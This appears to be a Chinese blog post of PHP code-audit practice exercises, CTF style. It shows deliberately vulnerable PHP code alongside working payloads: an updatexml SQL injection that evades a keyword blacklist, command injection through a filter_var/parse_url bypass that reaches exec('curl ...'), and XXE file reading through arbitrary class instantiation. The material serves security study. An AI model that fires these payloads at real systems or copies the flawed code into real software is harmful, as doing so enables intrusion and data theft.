2. 程式人生 > >PHP程式碼審計Day1-4練習題

PHP程式碼審計Day1-4練習題

阿新 發佈:2018-11-29

文章目錄

來自先知社群-紅日安全-

Day1 in_array函式缺陷

連結

//1.php
<?php
include 'config.php';
$conn = new
 
 mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
    die("連線失敗: ");
}

$sql = "SELECT COUNT(*) FROM users";
$whitelist = array();
$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    $whitelist = range(1, $row['COUNT(*)'
 
]);
}

$id = stop_hack($_GET['id']);
$sql = "SELECT * FROM users WHERE id=$id";

if (!in_array($id, $whitelist)) {
    die("id $id is not in whitelist.");
}

$result = $conn->query($sql);
if($result->num_rows > 0){
    $row = $result->fetch_assoc();
    echo "<center><table border='1'>"
 
;
    foreach ($row as $key => $value) {
        echo "<tr><td><center>$key</center></td><br>";
        echo "<td><center>$value</center></td></tr><br>";
    }
    echo "</table></center>";
}
else{
    die($conn->error);
}

?>

//config.php
<?php  
$servername = "localhost";
$username = "fire";
$password = "fire";
$dbname = "day1";

function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
    foreach($back_list as $hack){
        if(preg_match("/$hack/i", $value))
            die("$hack detected!");
    }
    return $value;
}
?>

解題

  • in_arry的繞過,沒有使用強匹配,所以可以繞過
  • stop_hack()過濾了常見的字串拼接函式,一樣可以用updatexml注入

payload

?id=4 and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))

Day2 - filter_var函式缺陷

<?php 
$url = $_GET['url'];
if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){
    $site_info = parse_url($url);
    if(preg_match('/sec-redclub.com$/',$site_info['host'])){
        exec('curl "'.$site_info['host'].'"', $result);
        echo "<center><h1>You have curl {$site_info['host']} successfully!</h1></center>
              <center><textarea rows='20' cols='90'>";
        echo implode(' ', $result);
    }
    else{
        die("<center><h1>Error: Host not allowed</h1></center>");
    }

}
else{
    echo "<center><h1>Just curl sec-redclub.com!</h1></center><br>
          <center><h3>For example:?url=http://sec-redclub.com</h3></center>";
}

?>

解題

  • filter_varFILTER_VALIDATE_URL進行繞過,如:
?url=demo://demo.com:80;sec-redclub.com:80/
?url=http://demo.com%23sec-redclub.com

payload

?url=demo://%22;ls;%22sec-redclub.com:80/

%22,為",閉合原始碼中的.系統SHELL執行的就是

curl"";ls;"sec-redclub.com"


?url=demo://%22;cat<flag.php;%22sec-redclub.com:80/

cat flag.php,有空格繞不過filter_var(),所以用cat<flag.php

Day3 例項化任意物件漏洞

<?php
class NotFound{
    function __construct()
    {
        die('404');
    }
}
spl_autoload_register(
    function ($class){
        new NotFound();
    }
);
$classname = isset($_GET['name']) ? $_GET['name'] : null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
if(class_exists($classname)){
    $newclass = new $classname($param,$param2);
    var_dump($newclass);
    foreach ($newclass as $key=>$value)
        echo $key.'=>'.$value.'<br>';
}

解題

  • 直接利用PHP的內建類,用GlobIterator類搜尋檔案
    GlobIterator

public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )

第一個引數為要搜尋檔名

?name=GlobIterator¶m=./*.php

payload1

  • SimpleXMLElement來讀取檔案內容
?name=SimpleXMLElement
¶m=<?xml version="1.0"?><!DOCTYPE ANY 
[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/day/flag.php">]>
<x>%26xxe;</x>¶m2=2

相關推薦

PHP程式碼審計Day1-4練習題

文章目錄 Day1 in_array函式缺陷 解題 payload Day2 - filter_var函式缺陷 解題 payload Day3 例項化

PHP程式碼審計Day5-8練習題

文章目錄 前言 Day5 – escapeshellarg與escapeshellcmd使用不當 解題 第一部分 payload: 第二部分 payload

PHP程式碼審計入門

部落格轉載 --程式碼審計入門   程式碼審計--準備 1,先放一張大圖,php程式碼審計的幾個方向,也是容易出問題的地方,沒事的時候可以多看看。   2,程式碼審計也就是拿到某網站的原始碼,進行審計,從而發現漏洞,但是我們審計的時候並不一定要一行一行的去看吧,這樣未免也太浪費時

php程式碼審計命令執行漏洞

命令執行漏洞,使用者通過瀏覽器在遠端伺服器上執行任意系統命令,嚴格意義上,與程式碼執行漏洞還是有一定的區別。  常用命令執行函式 exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引

PHP程式碼審計-SQL注入漏洞挖掘

SQL注入經常出現在登入頁面,HTTP頭(user-agent/client-ip/cookies等),訂單處理等地方,在發生多個互動的地方經常會發生二次注入。 普通注入 $uid = $_GET[‘id’]; $sql = “select * from user where id=$

PHP程式碼審計Day學習筆記5-8

文章目錄 Day5 - escapeshellarg與escapeshellcmd使用不當 前言 mail() FILTER_VALIDATE_EMAIL escapeshellcmd() escapes

PHP程式碼審計Day學習筆記

Day1 in_array函式缺陷 定義 in_array函式 bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) 引數 描述 needle

PHP程式碼審計學習

原文:http://paper.tuisec.win/detail/1fa2683bd1ca79c 作者:June 這是一次分享準備。自己還沒有總結這個的能力,這次就當個搬運工好了~~ 0x01 工具準備 PHPSTORM,不只是程式設計。 個人覺得只要能夠提供全域性搜尋、單

PHP程式碼審計

目錄 概述 輸入驗證和輸出顯示 3 2.1 命令注入 4 2.2 跨站指令碼 4 2.3 檔案包含 5 2.4 程式碼注入 5 2.5 SQL注入 6 2.6 XPath注入 6 2.7 HTTP響應拆分 6 2.8 檔案管理 6 2.9 檔案上傳 7

PHP程式碼審計實戰之XDcms

這裡主要講v2.0.8版本的XDcms中的一個基於錯誤的SQL注入漏洞,較v2.0.7版本而言修復了很多注入漏洞,使得注入漏洞大為減少。 至於CMS的下載配置等就不說了,直接審計吧~ 先整體看,點選index.php,先判斷是否存在檔案config.inc.php,若不存在

PHP程式碼審計片段講解(入門程式碼審計、CTF必備)

關於本專案 程式碼審計對於很多安全圈的新人來說,一直是一件頭疼的事情,也想跟著大牛們直接操刀審計CMS?卻處處碰壁: 函式看不懂! 漏洞原理不知道! PHP特性更不知! 那還怎麼愉快審計? 不如化繁為簡,跟著本專案先搞懂PHP中大多敏感函式與各類特性,再逐漸增加難度

PHP程式碼審計之命令執行

成功執行. 在具體分析細節之前,先說一下create_function()。 create_function返回一個字串的函式名, 這個函式名的格式是: "\000_lambda_" . count(anonymous_functions)++    我們來看看create_function的實現步驟:

PHP程式碼審計之路——5.程式碼執行及一句話木馬總結

mixed eval ( string $code ) 把字串 code 作為PHP程式碼執行 bool assert ( mixed $assertion [, string $description ] ) PHP 5bool assert ( mixed $asse

PHP程式碼審計————1、PHP程式碼審計之環境搭建

前言本系列部落格,主要講解PHP程式碼審計。從環境搭建到具體的實戰分析將會一步一步深入學習,希望可以對大家有所幫助。審計環境搭建作業系統:Window 7軟      件:phpstudy、VMware workstations14、seay 程式碼審計軟體、notepad+

PHP程式碼審計-常見危險函式

PHP程式碼執行函式 eval & assert & preg_replace eval 函式 說明: mixed eval ( string $code ) 把字串 code 作為PHP程式碼執行。 注意: 函式

CTF-PHP程式碼審計,正則表示式記錄

一、PHP自動化的全域性變數:$GLOBALS — 引用全域性作用域中可用的全部變數,一個包含了全部變數的全域性組合陣列。變數的名字就是陣列的鍵。flag In the variable ! <?

PHP程式碼審計練習一

定個小目標,每天審計一套原始碼。大的站點搞不定就找些小的來練習。這次練習的是一個留言版本的小功能。1.驗證碼可以從cookie中獲取。程式碼中留言板提交的驗證碼直接跟cookie中的regimcode中進行比較。那麼我們直接提交的時候抓包所以直接可以從cookie中獲取驗證碼

PHP程式碼審計 16 漏洞挖掘的思路

本文記錄 PHP 程式碼審計的學習過程,教程為暗月 2015 版的 PHP 程式碼審計課程 1. 簡介 漏洞形成的條件 可以控制的變數(一切輸入都是有害的) 變數到達有利

PHP程式碼審計實戰之MetInfo CMS

這次主要白盒審計MetInfo CMS的一個變數覆蓋漏洞。 先檢視\include\common.inc.php檔案,因為其中是通過$_request來獲取使用者請求的資訊: 這裡是遍歷初始化變數,很可能會出現變數覆蓋,判斷了key的第一個字元是不是“_”來避免覆蓋系統全

PHP程式碼審計01之in_array()函式缺陷

#前言 從今天起,結合紅日安全寫的文章,開始學習程式碼審計,題目均來自**PHP SECURITY CALENDAR 2017**,講完這個題目,會再用一道有相同問題的CTF題來進行鞏固。下面開始分析。 #漏洞分析 下面我們看第一題,程式碼如下: ``` ``` 這一關考察的是任意檔案上傳漏洞,導致這個漏洞